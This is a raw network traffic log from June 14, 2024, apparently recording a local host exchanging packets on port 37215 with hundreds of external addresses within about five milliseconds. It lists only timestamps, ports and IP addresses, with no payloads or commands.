                                            Jun 14, 2024 10:43:36.729209900 CEST3503437215192.168.2.14197.91.127.203
                                            Jun 14, 2024 10:43:36.729219913 CEST5062237215192.168.2.1441.216.208.178
                                            Jun 14, 2024 10:43:36.729233027 CEST4800437215192.168.2.14156.188.235.22
                                            Jun 14, 2024 10:43:36.729234934 CEST3721554136197.28.139.22192.168.2.14
                                            Jun 14, 2024 10:43:36.729243040 CEST3527637215192.168.2.14197.91.127.203
                                            Jun 14, 2024 10:43:36.729257107 CEST5658437215192.168.2.14197.171.150.86
                                            Jun 14, 2024 10:43:36.729265928 CEST3721537232156.211.60.159192.168.2.14
                                            Jun 14, 2024 10:43:36.729274988 CEST5658437215192.168.2.14197.171.150.86
                                            Jun 14, 2024 10:43:36.729280949 CEST3721548574156.106.88.214192.168.2.14
                                            Jun 14, 2024 10:43:36.729283094 CEST5682637215192.168.2.14197.171.150.86
                                            Jun 14, 2024 10:43:36.729295969 CEST3721548816156.106.88.214192.168.2.14
                                            Jun 14, 2024 10:43:36.729310989 CEST3721559488156.125.27.234192.168.2.14
                                            Jun 14, 2024 10:43:36.729326963 CEST4881637215192.168.2.14156.106.88.214
                                            Jun 14, 2024 10:43:36.729343891 CEST3721559730156.125.27.234192.168.2.14
                                            Jun 14, 2024 10:43:36.729357004 CEST3721536126197.175.137.231192.168.2.14
                                            Jun 14, 2024 10:43:36.729360104 CEST5577637215192.168.2.1441.198.192.16
                                            Jun 14, 2024 10:43:36.729367971 CEST5577637215192.168.2.1441.198.192.16
                                            Jun 14, 2024 10:43:36.729371071 CEST3721536368197.175.137.231192.168.2.14
                                            Jun 14, 2024 10:43:36.729372978 CEST5973037215192.168.2.14156.125.27.234
                                            Jun 14, 2024 10:43:36.729382992 CEST372153705241.100.116.144192.168.2.14
                                            Jun 14, 2024 10:43:36.729397058 CEST372153729441.100.116.144192.168.2.14
                                            Jun 14, 2024 10:43:36.729403019 CEST5601837215192.168.2.1441.198.192.16
                                            Jun 14, 2024 10:43:36.729406118 CEST3636837215192.168.2.14197.175.137.231
                                            Jun 14, 2024 10:43:36.729409933 CEST3721545572156.33.122.105192.168.2.14
                                            Jun 14, 2024 10:43:36.729424953 CEST3729437215192.168.2.1441.100.116.144
                                            Jun 14, 2024 10:43:36.729433060 CEST3721545814156.33.122.105192.168.2.14
                                            Jun 14, 2024 10:43:36.729444027 CEST5069437215192.168.2.14156.81.47.229
                                            Jun 14, 2024 10:43:36.729446888 CEST3721547034156.88.226.133192.168.2.14
                                            Jun 14, 2024 10:43:36.729453087 CEST5069437215192.168.2.14156.81.47.229
                                            Jun 14, 2024 10:43:36.729463100 CEST3721555768197.138.17.253192.168.2.14
                                            Jun 14, 2024 10:43:36.729470968 CEST4581437215192.168.2.14156.33.122.105
                                            Jun 14, 2024 10:43:36.729482889 CEST3721547276156.88.226.133192.168.2.14
                                            Jun 14, 2024 10:43:36.729484081 CEST5093637215192.168.2.14156.81.47.229
                                            Jun 14, 2024 10:43:36.729496956 CEST3721548576156.86.252.128192.168.2.14
                                            Jun 14, 2024 10:43:36.729509115 CEST3721548818156.86.252.128192.168.2.14
                                            Jun 14, 2024 10:43:36.729521036 CEST4727637215192.168.2.14156.88.226.133
                                            Jun 14, 2024 10:43:36.729521036 CEST5695037215192.168.2.1441.145.49.163
                                            Jun 14, 2024 10:43:36.729522943 CEST372155738641.133.233.14192.168.2.14
                                            Jun 14, 2024 10:43:36.729521036 CEST5695037215192.168.2.1441.145.49.163
                                            Jun 14, 2024 10:43:36.729540110 CEST372155762841.133.233.14192.168.2.14
                                            Jun 14, 2024 10:43:36.729547024 CEST4881837215192.168.2.14156.86.252.128
                                            Jun 14, 2024 10:43:36.729549885 CEST5719237215192.168.2.1441.145.49.163
                                            Jun 14, 2024 10:43:36.729559898 CEST372155246441.213.212.237192.168.2.14
                                            Jun 14, 2024 10:43:36.729573965 CEST372154895241.64.196.190192.168.2.14
                                            Jun 14, 2024 10:43:36.729578018 CEST5762837215192.168.2.1441.133.233.14
                                            Jun 14, 2024 10:43:36.729584932 CEST5089037215192.168.2.1441.241.231.209
                                            Jun 14, 2024 10:43:36.729597092 CEST372155270641.213.212.237192.168.2.14
                                            Jun 14, 2024 10:43:36.729608059 CEST5089037215192.168.2.1441.241.231.209
                                            Jun 14, 2024 10:43:36.729619026 CEST3721546416156.202.150.224192.168.2.14
                                            Jun 14, 2024 10:43:36.729635954 CEST5270637215192.168.2.1441.213.212.237
                                            Jun 14, 2024 10:43:36.729635954 CEST5113237215192.168.2.1441.241.231.209
                                            Jun 14, 2024 10:43:36.729645014 CEST3721546658156.202.150.224192.168.2.14
                                            Jun 14, 2024 10:43:36.729665995 CEST4881637215192.168.2.14156.106.88.214
                                            Jun 14, 2024 10:43:36.729674101 CEST372154270441.198.119.197192.168.2.14
                                            Jun 14, 2024 10:43:36.729676962 CEST4665837215192.168.2.14156.202.150.224
                                            Jun 14, 2024 10:43:36.729686975 CEST5973037215192.168.2.14156.125.27.234
                                            Jun 14, 2024 10:43:36.729687929 CEST372154294641.198.119.197192.168.2.14
                                            Jun 14, 2024 10:43:36.729702950 CEST3729437215192.168.2.1441.100.116.144
                                            Jun 14, 2024 10:43:36.729707003 CEST3636837215192.168.2.14197.175.137.231
                                            Jun 14, 2024 10:43:36.729711056 CEST3721540622156.208.48.118192.168.2.14
                                            Jun 14, 2024 10:43:36.729727030 CEST4294637215192.168.2.1441.198.119.197
                                            Jun 14, 2024 10:43:36.729728937 CEST3721551866197.200.116.255192.168.2.14
                                            Jun 14, 2024 10:43:36.729737043 CEST4581437215192.168.2.14156.33.122.105
                                            Jun 14, 2024 10:43:36.729743958 CEST4727637215192.168.2.14156.88.226.133
                                            Jun 14, 2024 10:43:36.729753017 CEST3721540864156.208.48.118192.168.2.14
                                            Jun 14, 2024 10:43:36.729760885 CEST4881837215192.168.2.14156.86.252.128
                                            Jun 14, 2024 10:43:36.729762077 CEST5762837215192.168.2.1441.133.233.14
                                            Jun 14, 2024 10:43:36.729772091 CEST3721544494197.199.250.147192.168.2.14
                                            Jun 14, 2024 10:43:36.729773045 CEST5270637215192.168.2.1441.213.212.237
                                            Jun 14, 2024 10:43:36.729787111 CEST4086437215192.168.2.14156.208.48.118
                                            Jun 14, 2024 10:43:36.729787111 CEST3721544736197.199.250.147192.168.2.14
                                            Jun 14, 2024 10:43:36.729792118 CEST3810037215192.168.2.14156.188.62.145
                                            Jun 14, 2024 10:43:36.729800940 CEST3721558656156.214.111.110192.168.2.14
                                            Jun 14, 2024 10:43:36.729810953 CEST3810037215192.168.2.14156.188.62.145
                                            Jun 14, 2024 10:43:36.729816914 CEST4473637215192.168.2.14197.199.250.147
                                            Jun 14, 2024 10:43:36.729836941 CEST3834237215192.168.2.14156.188.62.145
                                            Jun 14, 2024 10:43:36.729850054 CEST4201837215192.168.2.14197.195.114.208
                                            Jun 14, 2024 10:43:36.729856014 CEST4201837215192.168.2.14197.195.114.208
                                            Jun 14, 2024 10:43:36.729871988 CEST4226037215192.168.2.14197.195.114.208
                                            Jun 14, 2024 10:43:36.729890108 CEST5971437215192.168.2.14156.165.26.177
                                            Jun 14, 2024 10:43:36.729895115 CEST5971437215192.168.2.14156.165.26.177
                                            Jun 14, 2024 10:43:36.729912996 CEST5995637215192.168.2.14156.165.26.177
                                            Jun 14, 2024 10:43:36.729928970 CEST5062237215192.168.2.1441.216.208.178
                                            Jun 14, 2024 10:43:36.729945898 CEST5062237215192.168.2.1441.216.208.178
                                            Jun 14, 2024 10:43:36.729960918 CEST5086437215192.168.2.1441.216.208.178
                                            Jun 14, 2024 10:43:36.729964018 CEST3721539018156.234.43.13192.168.2.14
                                            Jun 14, 2024 10:43:36.729978085 CEST4800437215192.168.2.14156.188.235.22
                                            Jun 14, 2024 10:43:36.729978085 CEST3721558898156.214.111.110192.168.2.14
                                            Jun 14, 2024 10:43:36.730000019 CEST4800437215192.168.2.14156.188.235.22
                                            Jun 14, 2024 10:43:36.730001926 CEST3721555872156.157.145.42192.168.2.14
                                            Jun 14, 2024 10:43:36.730010033 CEST5889837215192.168.2.14156.214.111.110
                                            Jun 14, 2024 10:43:36.730019093 CEST3721549454156.128.113.32192.168.2.14
                                            Jun 14, 2024 10:43:36.730025053 CEST4824637215192.168.2.14156.188.235.22
                                            Jun 14, 2024 10:43:36.730032921 CEST3721557740197.32.65.176192.168.2.14
                                            Jun 14, 2024 10:43:36.730046988 CEST372154470641.90.65.244192.168.2.14
                                            Jun 14, 2024 10:43:36.730051041 CEST4665837215192.168.2.14156.202.150.224
                                            Jun 14, 2024 10:43:36.730060101 CEST3721553250156.85.17.57192.168.2.14
                                            Jun 14, 2024 10:43:36.730067015 CEST4294637215192.168.2.1441.198.119.197
                                            Jun 14, 2024 10:43:36.730071068 CEST4086437215192.168.2.14156.208.48.118
                                            Jun 14, 2024 10:43:36.730072975 CEST3721557050197.78.103.253192.168.2.14
                                            Jun 14, 2024 10:43:36.730086088 CEST372154647841.3.97.244192.168.2.14
                                            Jun 14, 2024 10:43:36.730098009 CEST4473637215192.168.2.14197.199.250.147
                                            Jun 14, 2024 10:43:36.730115891 CEST3721539274156.234.43.13192.168.2.14
                                            Jun 14, 2024 10:43:36.730129004 CEST372154920841.64.196.190192.168.2.14
                                            Jun 14, 2024 10:43:36.730134010 CEST5889837215192.168.2.14156.214.111.110
                                            Jun 14, 2024 10:43:36.730143070 CEST3721552122197.200.116.255192.168.2.14
                                            Jun 14, 2024 10:43:36.730156898 CEST3721556024197.138.17.253192.168.2.14
                                            Jun 14, 2024 10:43:36.730169058 CEST3721537488156.211.60.159192.168.2.14
                                            Jun 14, 2024 10:43:36.730181932 CEST3721554392197.28.139.22192.168.2.14
                                            Jun 14, 2024 10:43:36.730192900 CEST3721535326197.239.56.251192.168.2.14
                                            Jun 14, 2024 10:43:36.730206013 CEST3721542338197.12.153.202192.168.2.14
                                            Jun 14, 2024 10:43:36.730218887 CEST3721558664156.244.195.251192.168.2.14
                                            Jun 14, 2024 10:43:36.730232000 CEST3721545280156.163.195.105192.168.2.14
                                            Jun 14, 2024 10:43:36.730427980 CEST3721536342156.152.18.16192.168.2.14
                                            Jun 14, 2024 10:43:36.730442047 CEST3721535500156.175.5.233192.168.2.14
                                            Jun 14, 2024 10:43:36.730454922 CEST3721547214156.13.229.147192.168.2.14
                                            Jun 14, 2024 10:43:36.730467081 CEST372154490241.86.162.204192.168.2.14
                                            Jun 14, 2024 10:43:36.730479956 CEST3721542948156.218.27.154192.168.2.14
                                            Jun 14, 2024 10:43:36.730494022 CEST3721534252197.45.22.82192.168.2.14
                                            Jun 14, 2024 10:43:36.730505943 CEST3721544640197.107.203.197192.168.2.14
                                            Jun 14, 2024 10:43:36.730519056 CEST3721541678156.195.211.251192.168.2.14
                                            Jun 14, 2024 10:43:36.730532885 CEST3721538508156.121.211.4192.168.2.14
                                            Jun 14, 2024 10:43:36.730545998 CEST372154130841.203.157.254192.168.2.14
                                            Jun 14, 2024 10:43:36.730556965 CEST3721534858156.206.126.195192.168.2.14
                                            Jun 14, 2024 10:43:36.730570078 CEST3721544742156.83.121.141192.168.2.14
                                            Jun 14, 2024 10:43:36.730582952 CEST3721556794197.78.103.253192.168.2.14
                                            Jun 14, 2024 10:43:36.730597019 CEST3721556114156.157.145.42192.168.2.14
                                            Jun 14, 2024 10:43:36.730608940 CEST372154622241.3.97.244192.168.2.14
                                            Jun 14, 2024 10:43:36.730623007 CEST3721551316156.240.147.158192.168.2.14
                                            Jun 14, 2024 10:43:36.730631113 CEST5611437215192.168.2.14156.157.145.42
                                            Jun 14, 2024 10:43:36.730635881 CEST3721552994156.85.17.57192.168.2.14
                                            Jun 14, 2024 10:43:36.730649948 CEST3721551558156.240.147.158192.168.2.14
                                            Jun 14, 2024 10:43:36.730659962 CEST5611437215192.168.2.14156.157.145.42
                                            Jun 14, 2024 10:43:36.730679989 CEST5155837215192.168.2.14156.240.147.158
                                            Jun 14, 2024 10:43:36.730683088 CEST3721538404156.191.85.116192.168.2.14
                                            Jun 14, 2024 10:43:36.730700970 CEST3721538646156.191.85.116192.168.2.14
                                            Jun 14, 2024 10:43:36.730715036 CEST372155681841.36.144.189192.168.2.14
                                            Jun 14, 2024 10:43:36.730720043 CEST5155837215192.168.2.14156.240.147.158
                                            Jun 14, 2024 10:43:36.730729103 CEST372154445041.90.65.244192.168.2.14
                                            Jun 14, 2024 10:43:36.730737925 CEST3864637215192.168.2.14156.191.85.116
                                            Jun 14, 2024 10:43:36.730742931 CEST372155706041.36.144.189192.168.2.14
                                            Jun 14, 2024 10:43:36.730762005 CEST3721538032156.215.194.77192.168.2.14
                                            Jun 14, 2024 10:43:36.730772018 CEST3864637215192.168.2.14156.191.85.116
                                            Jun 14, 2024 10:43:36.730776072 CEST3721538274156.215.194.77192.168.2.14
                                            Jun 14, 2024 10:43:36.730777025 CEST5706037215192.168.2.1441.36.144.189
                                            Jun 14, 2024 10:43:36.730789900 CEST3721544322197.69.119.231192.168.2.14
                                            Jun 14, 2024 10:43:36.730796099 CEST5706037215192.168.2.1441.36.144.189
                                            Jun 14, 2024 10:43:36.730803013 CEST3721544564197.69.119.231192.168.2.14
                                            Jun 14, 2024 10:43:36.730808020 CEST3827437215192.168.2.14156.215.194.77
                                            Jun 14, 2024 10:43:36.730830908 CEST3827437215192.168.2.14156.215.194.77
                                            Jun 14, 2024 10:43:36.730832100 CEST372155556241.25.184.121192.168.2.14
                                            Jun 14, 2024 10:43:36.730833054 CEST4456437215192.168.2.14197.69.119.231
                                            Jun 14, 2024 10:43:36.730845928 CEST372155580441.25.184.121192.168.2.14
                                            Jun 14, 2024 10:43:36.730855942 CEST4456437215192.168.2.14197.69.119.231
                                            Jun 14, 2024 10:43:36.730859041 CEST3721560476156.152.207.55192.168.2.14
                                            Jun 14, 2024 10:43:36.730871916 CEST3721557484197.32.65.176192.168.2.14
                                            Jun 14, 2024 10:43:36.730878115 CEST5580437215192.168.2.1441.25.184.121
                                            Jun 14, 2024 10:43:36.730897903 CEST3721560718156.152.207.55192.168.2.14
                                            Jun 14, 2024 10:43:36.730909109 CEST5580437215192.168.2.1441.25.184.121
                                            Jun 14, 2024 10:43:36.730911970 CEST3721551832156.183.202.248192.168.2.14
                                            Jun 14, 2024 10:43:36.730925083 CEST3721549198156.128.113.32192.168.2.14
                                            Jun 14, 2024 10:43:36.730936050 CEST6071837215192.168.2.14156.152.207.55
                                            Jun 14, 2024 10:43:36.730947971 CEST3721552074156.183.202.248192.168.2.14
                                            Jun 14, 2024 10:43:36.730961084 CEST6071837215192.168.2.14156.152.207.55
                                            Jun 14, 2024 10:43:36.730969906 CEST372154342441.57.133.165192.168.2.14
                                            Jun 14, 2024 10:43:36.730979919 CEST5207437215192.168.2.14156.183.202.248
                                            Jun 14, 2024 10:43:36.730993986 CEST5207437215192.168.2.14156.183.202.248
                                            Jun 14, 2024 10:43:36.730998039 CEST372154366641.57.133.165192.168.2.14
                                            Jun 14, 2024 10:43:36.731010914 CEST372154763641.253.22.215192.168.2.14
                                            Jun 14, 2024 10:43:36.731034040 CEST372154787841.253.22.215192.168.2.14
                                            Jun 14, 2024 10:43:36.731036901 CEST4366637215192.168.2.1441.57.133.165
                                            Jun 14, 2024 10:43:36.731055975 CEST4366637215192.168.2.1441.57.133.165
                                            Jun 14, 2024 10:43:36.731066942 CEST4787837215192.168.2.1441.253.22.215
                                            Jun 14, 2024 10:43:36.731090069 CEST4787837215192.168.2.1441.253.22.215
                                            Jun 14, 2024 10:43:36.731102943 CEST3721543798156.154.140.211192.168.2.14
                                            Jun 14, 2024 10:43:36.731117964 CEST3721544040156.154.140.211192.168.2.14
                                            Jun 14, 2024 10:43:36.731131077 CEST372155283041.101.141.48192.168.2.14
                                            Jun 14, 2024 10:43:36.731143951 CEST372155307241.101.141.48192.168.2.14
                                            Jun 14, 2024 10:43:36.731156111 CEST4404037215192.168.2.14156.154.140.211
                                            Jun 14, 2024 10:43:36.731174946 CEST5307237215192.168.2.1441.101.141.48
                                            Jun 14, 2024 10:43:36.731178999 CEST4404037215192.168.2.14156.154.140.211
                                            Jun 14, 2024 10:43:36.731197119 CEST5307237215192.168.2.1441.101.141.48
                                            Jun 14, 2024 10:43:36.731255054 CEST3721553102156.176.170.105192.168.2.14
                                            Jun 14, 2024 10:43:36.731270075 CEST3721553344156.176.170.105192.168.2.14
                                            Jun 14, 2024 10:43:36.731285095 CEST372153451641.130.45.29192.168.2.14
                                            Jun 14, 2024 10:43:36.731298923 CEST372153475841.130.45.29192.168.2.14
                                            Jun 14, 2024 10:43:36.731309891 CEST5334437215192.168.2.14156.176.170.105
                                            Jun 14, 2024 10:43:36.731313944 CEST3721557080197.188.181.168192.168.2.14
                                            Jun 14, 2024 10:43:36.731328011 CEST3721557322197.188.181.168192.168.2.14
                                            Jun 14, 2024 10:43:36.731331110 CEST3475837215192.168.2.1441.130.45.29
                                            Jun 14, 2024 10:43:36.731338024 CEST5334437215192.168.2.14156.176.170.105
                                            Jun 14, 2024 10:43:36.731353045 CEST3721545888156.128.84.72192.168.2.14
                                            Jun 14, 2024 10:43:36.731359005 CEST5732237215192.168.2.14197.188.181.168
                                            Jun 14, 2024 10:43:36.731375933 CEST3475837215192.168.2.1441.130.45.29
                                            Jun 14, 2024 10:43:36.731383085 CEST3721546130156.128.84.72192.168.2.14
                                            Jun 14, 2024 10:43:36.731389046 CEST5732237215192.168.2.14197.188.181.168
                                            Jun 14, 2024 10:43:36.731411934 CEST4613037215192.168.2.14156.128.84.72
                                            Jun 14, 2024 10:43:36.731432915 CEST4613037215192.168.2.14156.128.84.72
                                            Jun 14, 2024 10:43:36.731503963 CEST3721542654156.239.245.97192.168.2.14
                                            Jun 14, 2024 10:43:36.731518030 CEST3721534542197.182.25.170192.168.2.14
                                            Jun 14, 2024 10:43:36.731530905 CEST3721534784197.182.25.170192.168.2.14
                                            Jun 14, 2024 10:43:36.731544018 CEST3721560448156.28.121.91192.168.2.14
                                            Jun 14, 2024 10:43:36.731555939 CEST3721560690156.28.121.91192.168.2.14
                                            Jun 14, 2024 10:43:36.731568098 CEST3478437215192.168.2.14197.182.25.170
                                            Jun 14, 2024 10:43:36.731570959 CEST3721542896156.239.245.97192.168.2.14
                                            Jun 14, 2024 10:43:36.731590986 CEST6069037215192.168.2.14156.28.121.91
                                            Jun 14, 2024 10:43:36.731590986 CEST3478437215192.168.2.14197.182.25.170
                                            Jun 14, 2024 10:43:36.731612921 CEST4289637215192.168.2.14156.239.245.97
                                            Jun 14, 2024 10:43:36.731612921 CEST4289637215192.168.2.14156.239.245.97
                                            Jun 14, 2024 10:43:36.731616020 CEST6069037215192.168.2.14156.28.121.91
                                            Jun 14, 2024 10:43:36.731698990 CEST372155427641.96.204.199192.168.2.14
                                            Jun 14, 2024 10:43:36.731712103 CEST372155306241.49.236.219192.168.2.14
                                            Jun 14, 2024 10:43:36.731725931 CEST372155451841.96.204.199192.168.2.14
                                            Jun 14, 2024 10:43:36.731739998 CEST372155330441.49.236.219192.168.2.14
                                            Jun 14, 2024 10:43:36.731770992 CEST5451837215192.168.2.1441.96.204.199
                                            Jun 14, 2024 10:43:36.731770992 CEST5330437215192.168.2.1441.49.236.219
                                            Jun 14, 2024 10:43:36.731794119 CEST5451837215192.168.2.1441.96.204.199
                                            Jun 14, 2024 10:43:36.731820107 CEST5330437215192.168.2.1441.49.236.219
                                            Jun 14, 2024 10:43:36.731826067 CEST372155719441.211.157.43192.168.2.14
                                            Jun 14, 2024 10:43:36.731839895 CEST372155743641.211.157.43192.168.2.14
                                            Jun 14, 2024 10:43:36.731868029 CEST3721560640156.186.209.190192.168.2.14
                                            Jun 14, 2024 10:43:36.731873035 CEST5743637215192.168.2.1441.211.157.43
                                            Jun 14, 2024 10:43:36.731880903 CEST3721560882156.186.209.190192.168.2.14
                                            Jun 14, 2024 10:43:36.731889963 CEST5743637215192.168.2.1441.211.157.43
                                            Jun 14, 2024 10:43:36.731911898 CEST372154479041.200.83.167192.168.2.14
                                            Jun 14, 2024 10:43:36.731920004 CEST6088237215192.168.2.14156.186.209.190
                                            Jun 14, 2024 10:43:36.731942892 CEST6088237215192.168.2.14156.186.209.190
                                            Jun 14, 2024 10:43:36.731956005 CEST372154503241.200.83.167192.168.2.14
                                            Jun 14, 2024 10:43:36.731971979 CEST372155485641.224.251.84192.168.2.14
                                            Jun 14, 2024 10:43:36.731992006 CEST372155509841.224.251.84192.168.2.14
                                            Jun 14, 2024 10:43:36.731992006 CEST4503237215192.168.2.1441.200.83.167
                                            Jun 14, 2024 10:43:36.732013941 CEST4503237215192.168.2.1441.200.83.167
                                            Jun 14, 2024 10:43:36.732039928 CEST5509837215192.168.2.1441.224.251.84
                                            Jun 14, 2024 10:43:36.732039928 CEST5509837215192.168.2.1441.224.251.84
                                            Jun 14, 2024 10:43:36.732095003 CEST372154497441.113.63.75192.168.2.14
                                            Jun 14, 2024 10:43:36.732120991 CEST372154521641.113.63.75192.168.2.14
                                            Jun 14, 2024 10:43:36.732132912 CEST372154755641.20.95.37192.168.2.14
                                            Jun 14, 2024 10:43:36.732146978 CEST372154779841.20.95.37192.168.2.14
                                            Jun 14, 2024 10:43:36.732165098 CEST4521637215192.168.2.1441.113.63.75
                                            Jun 14, 2024 10:43:36.732177973 CEST4779837215192.168.2.1441.20.95.37
                                            Jun 14, 2024 10:43:36.732187986 CEST4521637215192.168.2.1441.113.63.75
                                            Jun 14, 2024 10:43:36.732203007 CEST4779837215192.168.2.1441.20.95.37
                                            Jun 14, 2024 10:43:36.732233047 CEST3721537986197.253.193.58192.168.2.14
                                            Jun 14, 2024 10:43:36.732244968 CEST3721548212156.155.254.253192.168.2.14
                                            Jun 14, 2024 10:43:36.732264042 CEST3798637215192.168.2.14197.253.193.58
                                            Jun 14, 2024 10:43:36.732280970 CEST3721548454156.155.254.253192.168.2.14
                                            Jun 14, 2024 10:43:36.732295036 CEST3721545780156.117.60.7192.168.2.14
                                            Jun 14, 2024 10:43:36.732309103 CEST3721547656197.235.203.125192.168.2.14
                                            Jun 14, 2024 10:43:36.732320070 CEST4845437215192.168.2.14156.155.254.253
                                            Jun 14, 2024 10:43:36.732331991 CEST3721546020156.117.60.7192.168.2.14
                                            Jun 14, 2024 10:43:36.732340097 CEST4765637215192.168.2.14197.235.203.125
                                            Jun 14, 2024 10:43:36.732348919 CEST4845437215192.168.2.14156.155.254.253
                                            Jun 14, 2024 10:43:36.732363939 CEST4602037215192.168.2.14156.117.60.7
                                            Jun 14, 2024 10:43:36.732386112 CEST4602037215192.168.2.14156.117.60.7
                                            Jun 14, 2024 10:43:36.732414961 CEST372154929041.221.232.180192.168.2.14
                                            Jun 14, 2024 10:43:36.732429028 CEST372154953441.221.232.180192.168.2.14
                                            Jun 14, 2024 10:43:36.732440948 CEST372154212841.78.28.179192.168.2.14
                                            Jun 14, 2024 10:43:36.732454062 CEST372154237041.78.28.179192.168.2.14
                                            Jun 14, 2024 10:43:36.732467890 CEST4953437215192.168.2.1441.221.232.180
                                            Jun 14, 2024 10:43:36.732469082 CEST372155436241.67.94.127192.168.2.14
                                            Jun 14, 2024 10:43:36.732494116 CEST4953437215192.168.2.1441.221.232.180
                                            Jun 14, 2024 10:43:36.732522964 CEST4237037215192.168.2.1441.78.28.179
                                            Jun 14, 2024 10:43:36.732522964 CEST5436237215192.168.2.1441.67.94.127
                                            Jun 14, 2024 10:43:36.732522964 CEST4237037215192.168.2.1441.78.28.179
                                            Jun 14, 2024 10:43:36.732644081 CEST3721542832197.184.220.213192.168.2.14
                                            Jun 14, 2024 10:43:36.732657909 CEST3721558328197.168.250.8192.168.2.14
                                            Jun 14, 2024 10:43:36.732671022 CEST3721543074197.184.220.213192.168.2.14
                                            Jun 14, 2024 10:43:36.732683897 CEST372153789841.107.1.22192.168.2.14
                                            Jun 14, 2024 10:43:36.732697010 CEST3721545864197.23.121.148192.168.2.14
                                            Jun 14, 2024 10:43:36.732697964 CEST5832837215192.168.2.14197.168.250.8
                                            Jun 14, 2024 10:43:36.732703924 CEST4307437215192.168.2.14197.184.220.213
                                            Jun 14, 2024 10:43:36.732726097 CEST4586437215192.168.2.14197.23.121.148
                                            Jun 14, 2024 10:43:36.732733965 CEST4307437215192.168.2.14197.184.220.213
                                            Jun 14, 2024 10:43:36.732753992 CEST372153814041.107.1.22192.168.2.14
                                            Jun 14, 2024 10:43:36.732768059 CEST3721560650156.22.65.139192.168.2.14
                                            Jun 14, 2024 10:43:36.732780933 CEST3721560892156.22.65.139192.168.2.14
                                            Jun 14, 2024 10:43:36.732791901 CEST3814037215192.168.2.1441.107.1.22
                                            Jun 14, 2024 10:43:36.732794046 CEST3721545418197.29.229.122192.168.2.14
                                            Jun 14, 2024 10:43:36.732812881 CEST6089237215192.168.2.14156.22.65.139
                                            Jun 14, 2024 10:43:36.732819080 CEST3721555346197.25.195.106192.168.2.14
                                            Jun 14, 2024 10:43:36.732824087 CEST3814037215192.168.2.1441.107.1.22
                                            Jun 14, 2024 10:43:36.732834101 CEST3721545660197.29.229.122192.168.2.14
                                            Jun 14, 2024 10:43:36.732846975 CEST3721536004156.32.16.165192.168.2.14
                                            Jun 14, 2024 10:43:36.732850075 CEST6089237215192.168.2.14156.22.65.139
                                            Jun 14, 2024 10:43:36.732851982 CEST5534637215192.168.2.14197.25.195.106
                                            Jun 14, 2024 10:43:36.732868910 CEST5534637215192.168.2.14197.25.195.106
                                            Jun 14, 2024 10:43:36.732872963 CEST4566037215192.168.2.14197.29.229.122
                                            Jun 14, 2024 10:43:36.732877016 CEST3600437215192.168.2.14156.32.16.165
                                            Jun 14, 2024 10:43:36.732889891 CEST3721555104197.25.195.106192.168.2.14
                                            Jun 14, 2024 10:43:36.732897997 CEST4566037215192.168.2.14197.29.229.122
                                            Jun 14, 2024 10:43:36.732903004 CEST3721558520197.130.253.152192.168.2.14
                                            Jun 14, 2024 10:43:36.732917070 CEST3721558762197.130.253.152192.168.2.14
                                            Jun 14, 2024 10:43:36.732949018 CEST372155573441.27.148.16192.168.2.14
                                            Jun 14, 2024 10:43:36.732953072 CEST5876237215192.168.2.14197.130.253.152
                                            Jun 14, 2024 10:43:36.732961893 CEST372155597641.27.148.16192.168.2.14
                                            Jun 14, 2024 10:43:36.732975006 CEST5876237215192.168.2.14197.130.253.152
                                            Jun 14, 2024 10:43:36.732988119 CEST5597637215192.168.2.1441.27.148.16
                                            Jun 14, 2024 10:43:36.732989073 CEST372153411441.248.249.197192.168.2.14
                                            Jun 14, 2024 10:43:36.732995033 CEST5597637215192.168.2.1441.27.148.16
                                            Jun 14, 2024 10:43:36.733004093 CEST372154643441.105.239.212192.168.2.14
                                            Jun 14, 2024 10:43:36.733017921 CEST372154667641.105.239.212192.168.2.14
                                            Jun 14, 2024 10:43:36.733021975 CEST3411437215192.168.2.1441.248.249.197
                                            Jun 14, 2024 10:43:36.733052969 CEST4667637215192.168.2.1441.105.239.212
                                            Jun 14, 2024 10:43:36.733071089 CEST4667637215192.168.2.1441.105.239.212
                                            Jun 14, 2024 10:43:36.733330965 CEST3721533296197.218.110.112192.168.2.14
                                            Jun 14, 2024 10:43:36.733345032 CEST3721537798197.99.180.169192.168.2.14
                                            Jun 14, 2024 10:43:36.733365059 CEST3329637215192.168.2.14197.218.110.112
                                            Jun 14, 2024 10:43:36.733371019 CEST3779837215192.168.2.14197.99.180.169
                                            Jun 14, 2024 10:43:36.733387947 CEST3721558512156.251.224.110192.168.2.14
                                            Jun 14, 2024 10:43:36.733433008 CEST5851237215192.168.2.14156.251.224.110
                                            Jun 14, 2024 10:43:36.733561039 CEST3721537276156.41.125.115192.168.2.14
                                            Jun 14, 2024 10:43:36.733573914 CEST3721533854156.248.26.132192.168.2.14
                                            Jun 14, 2024 10:43:36.733591080 CEST3727637215192.168.2.14156.41.125.115
                                            Jun 14, 2024 10:43:36.733597994 CEST3385437215192.168.2.14156.248.26.132
                                            Jun 14, 2024 10:43:36.733822107 CEST3721533804156.255.160.13192.168.2.14
                                            Jun 14, 2024 10:43:36.733859062 CEST3380437215192.168.2.14156.255.160.13
                                            Jun 14, 2024 10:43:36.733884096 CEST3721546160197.54.76.33192.168.2.14
                                            Jun 14, 2024 10:43:36.733915091 CEST4616037215192.168.2.14197.54.76.33
                                            Jun 14, 2024 10:43:36.734239101 CEST3721532870197.78.104.164192.168.2.14
                                            Jun 14, 2024 10:43:36.734251976 CEST372153951641.43.246.92192.168.2.14
                                            Jun 14, 2024 10:43:36.734272003 CEST3287037215192.168.2.14197.78.104.164
                                            Jun 14, 2024 10:43:36.734293938 CEST3951637215192.168.2.1441.43.246.92
                                            Jun 14, 2024 10:43:36.734370947 CEST3721542236197.180.166.46192.168.2.14
                                            Jun 14, 2024 10:43:36.734402895 CEST4223637215192.168.2.14197.180.166.46
                                            Jun 14, 2024 10:43:36.734499931 CEST3721552968156.167.152.186192.168.2.14
                                            Jun 14, 2024 10:43:36.734534979 CEST5296837215192.168.2.14156.167.152.186
                                            Jun 14, 2024 10:43:36.734787941 CEST372154679641.122.52.32192.168.2.14
                                            Jun 14, 2024 10:43:36.734802961 CEST3721538440156.135.33.111192.168.2.14
                                            Jun 14, 2024 10:43:36.734816074 CEST3721538682156.135.33.111192.168.2.14
                                            Jun 14, 2024 10:43:36.734827995 CEST4679637215192.168.2.1441.122.52.32
                                            Jun 14, 2024 10:43:36.734839916 CEST372153373841.13.20.24192.168.2.14
                                            Jun 14, 2024 10:43:36.734857082 CEST3721537762156.180.55.148192.168.2.14
                                            Jun 14, 2024 10:43:36.734864950 CEST3868237215192.168.2.14156.135.33.111
                                            Jun 14, 2024 10:43:36.734873056 CEST3373837215192.168.2.1441.13.20.24
